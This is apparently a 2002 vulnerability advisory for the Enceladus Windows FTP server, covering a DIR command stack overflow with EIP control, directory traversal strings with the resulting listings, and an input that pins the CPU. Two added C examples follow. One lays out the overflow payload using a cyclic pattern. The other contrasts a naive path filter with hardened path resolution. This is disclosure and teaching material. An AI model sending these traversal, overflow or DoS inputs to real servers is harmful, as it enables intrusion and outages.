
Multiple vulnerabilities in Enceladus Server



securma massine
19/12/02, 20:34

hi
Enceladus Server Suite is a lightweight Internet/Intranet Web and FTP
server for Windows. According to Mollensoft, version 3.9 "Includes a
fix to the directory traversal vulnerability... (This is a CRITICAL
SECURITY UPDATE)"
http://www.mollensoft.com/
I found several critical vulnerabilities in this server.
1- buffer overflow and remote code execution:
Tamer reported that the server crashed with a "long sequence of
characters as an argument to "CD" command"
(http://online.securityfocus.com/archive/1/302596). I believe it was
not treated as a true buffer overflow, because that crash only
overwrites ESP and thus allows only a simple DoS attack:
50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)
With the "DIR" command we can overwrite EIP:
dir + [buffer = 279 bytes] >> EIP is overwritten at bytes 42,43,44,45,
which is sufficient for the injection of a shellcode.
The state of the registers is:
the state of the registers is:

Access violation - code c0000005 (first chance)
eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0 edi=0019affd
eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
61616161 ?? ???

Note that EIP is taken from the beginning of our buffer:
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

The "mget" command gives the same result.
The exploit is simple to realize, since EBX points to our buffer:
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61

2- directory traversal


ftp> cd ..
access denied
ftp> cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09 emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52 execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22 exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12 fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41 mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09 MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09 signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

[NO COMMENT]

3- denial of service and CPU consumption
ftp> cd @/..@/..
(no response)
CPU 99% used

securma massine






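Added example for the DIR overflow described in section 1 of the post above; this is illustration code, not code from the advisory or from Mollensoft, and it talks to no server. It shows the two steps a practitioner does with a crash like the one in the register dump: send a cyclic pattern instead of a run of 'a' so the value that lands in EIP identifies its offset, then build the 279-byte DIR argument with a chosen four bytes at that offset. The zero-based offset 41 is an assumption read off the advisory's illustration (41 filler bytes, then "[EIP=4BYTE]", i.e. "42,43,44,45" counted from 1), and the value written there is a placeholder marker, not a real return address.

```c
/* Added example: EIP offset location and payload layout for an FTP
 * "DIR <argument>" stack overflow. Not the advisory's or vendor's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARG_LEN    279  /* argument length reported in the advisory */
#define EIP_OFFSET 41   /* assumption: advisory's "42,43,44,45", counted from 1 */

/* Metasploit-style cyclic pattern ("Aa0Aa1Aa2..."): each 4-byte window is
 * unique within the first 20280 bytes, so the bytes that reach EIP pin
 * down where in the argument the saved return address sits. */
static size_t cyclic_pattern(char *out, size_t n)
{
    static const char up[]  = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    static const char low[] = "abcdefghijklmnopqrstuvwxyz";
    static const char dig[] = "0123456789";
    size_t k = 0;
    for (size_t t = 0; k < n; t++) {
        char trip[3] = { up[(t / 260) % 26], low[(t / 10) % 26], dig[t % 10] };
        for (int j = 0; j < 3 && k < n; j++)
            out[k++] = trip[j];
    }
    return k;
}

/* Simulate what the debugger shows: x86 is little-endian, so the EIP value
 * is the four bytes at the overwrite offset read low byte first. An all-'a'
 * buffer yields 0x61616161, exactly as in the advisory's register dump. */
static uint32_t eip_from_overwrite(const char *buf, size_t off)
{
    const unsigned char *b = (const unsigned char *)buf + off;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Inverse step: given the crashed EIP, find the offset of those bytes in
 * the pattern that was sent. Returns -1 if the value is not from the pattern. */
static long pattern_offset(const char *pat, size_t n, uint32_t eip)
{
    unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff,
                                (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Build "DIR <argument>\r\n": 'a' filler (0x61, as in the dump) with
 * `value` stored little-endian at EIP_OFFSET. Returns the command length,
 * or 0 if `out` is too small. `value` is a placeholder, not a gadget address. */
static size_t build_dir_command(char *out, size_t outlen, uint32_t value)
{
    const size_t total = 4 + ARG_LEN + 2;
    if (outlen < total + 1)
        return 0;
    memcpy(out, "DIR ", 4);
    memset(out + 4, 'a', ARG_LEN);
    for (int j = 0; j < 4; j++)
        out[4 + EIP_OFFSET + j] = (char)((value >> (8 * j)) & 0xff);
    memcpy(out + 4 + ARG_LEN, "\r\n", 2);
    out[total] = '\0';
    return total;
}

int main(void)
{
    char pat[ARG_LEN], cmd[4 + ARG_LEN + 3];

    cyclic_pattern(pat, ARG_LEN);
    uint32_t eip = eip_from_overwrite(pat, EIP_OFFSET);   /* what the crash would show */
    printf("crash EIP=%08x -> pattern offset %ld\n", eip,
           pattern_offset(pat, ARG_LEN, eip));

    size_t n = build_dir_command(cmd, sizeof cmd, 0x42424242u);
    printf("%zu-byte command, argument bytes %d..%d = %.4s\n",
           n, EIP_OFFSET, EIP_OFFSET + 3, cmd + 4 + EIP_OFFSET);
    return 0;
}
```

The pattern is the part worth keeping: sending 'a' filler tells you that EIP was overwritten, sending a cyclic pattern tells you where, and only the latter lets you place a return address deliberately.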
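Added example for the directory traversal in section 2 and the CPU exhaustion in section 3 of the post above; this is illustration code, not the server's code and not the advisory's. The post shows that a bare "cd .." is refused while "cd @/....\" and "cd @@@@@@@@@@@/..c:\" are accepted, which is the signature of a blacklist applied to the raw string. `naive_cwd_allowed` is a hypothetical reconstruction of such a filter (the real check in ftpservx.dll is not known), written so that it reproduces the observed accept/refuse behaviour; `safe_cwd_resolve` is the hardened alternative: normalise separators, walk the components against a virtual root, and refuse any component that is not a plain name. Function names, the 260-byte limit and the sample paths are assumptions.

```c
/* Added example: string-blacklist CWD filter versus component-walk
 * resolution against a virtual FTP root. Hypothetical code, not Enceladus's. */
#include <stdio.h>
#include <string.h>

#define MAX_PATH_LEN 260

/* Hypothetical naive filter, reconstructed from the advisory's observations:
 * it only knows ".." as a whole argument, as a "../" prefix or as "/../".
 * All three payloads from the advisory slip past it. */
static int naive_cwd_allowed(const char *arg)
{
    if (strcmp(arg, "..") == 0) return 0;
    if (strncmp(arg, "../", 3) == 0) return 0;
    if (strstr(arg, "/../") != NULL) return 0;
    return 1;
}

/* Hardened resolution. `cwd` is the current virtual directory ("/" is the
 * FTP root). On success writes the new virtual path to `out` and returns 1;
 * returns 0 (the server would answer 550) for anything that would leave the
 * root or that is not a plain file name. Work is linear in the argument
 * length, so a crafted argument cannot spin the CPU. */
static int safe_cwd_resolve(const char *cwd, const char *arg, char *out, size_t outlen)
{
    char buf[MAX_PATH_LEN], path[MAX_PATH_LEN];
    size_t i, len;
    char *p;

    if (cwd[0] != '/' || strlen(cwd) >= sizeof path || strlen(arg) >= sizeof buf)
        return 0;
    /* Windows accepts both separators, so normalise before looking at components. */
    for (i = 0; ; i++) {
        buf[i] = (arg[i] == '\\') ? '/' : arg[i];
        if (arg[i] == '\0') break;
    }
    /* Absolute arguments start over at the virtual root, relative ones at cwd. */
    strcpy(path, buf[0] == '/' ? "/" : cwd);
    len = strlen(path);
    while (len > 1 && path[len - 1] == '/') path[--len] = '\0';

    for (p = buf; *p != '\0'; ) {
        char *tok;
        int all_dots = 1;
        while (*p == '/') p++;
        if (*p == '\0') break;
        tok = p;
        while (*p != '\0' && *p != '/') p++;
        if (*p != '\0') *p++ = '\0';

        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {
            if (len <= 1) return 0;                  /* would leave the virtual root */
            while (len > 1 && path[len - 1] != '/') len--;
            if (len > 1) len--;                      /* drop the separator as well */
            path[len] = '\0';
            continue;
        }
        /* Refuse anything that is not a plain name: a drive or NTFS stream
         * colon, control characters, or a component made only of dots
         * ("....", which some Windows path layers have treated as extra
         * parent steps). */
        for (const char *q = tok; *q != '\0'; q++) {
            if (*q == ':' || (unsigned char)*q < 0x20) return 0;
            if (*q != '.') all_dots = 0;
        }
        if (all_dots) return 0;
        if (len + 1 + strlen(tok) >= sizeof path) return 0;
        if (path[len - 1] != '/') path[len++] = '/';
        strcpy(path + len, tok);
        len += strlen(tok);
    }
    if (len >= outlen) return 0;
    strcpy(out, path);
    return 1;
}

int main(void)
{
    /* The three CWD arguments from the advisory, as typed at the ftp> prompt. */
    const char *probes[] = { "..", "@/....\\", "@@@@@@@@@@@/..c:\\", "@/..@/.." };
    char out[MAX_PATH_LEN];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int ok = safe_cwd_resolve("/", probes[i], out, sizeof out);
        printf("%-22s naive:%s  hardened:%s\n", probes[i],
               naive_cwd_allowed(probes[i]) ? "allow" : "deny",
               ok ? out : "deny");
    }
    return 0;
}
```

The point is not the particular bypass strings: a blacklist on the raw argument will always have one more encoding it did not think of (here "....", a backslash, a drive letter after ".."). Resolving to a canonical virtual path first and then checking that path is the only check that does not depend on guessing the attacker's spelling.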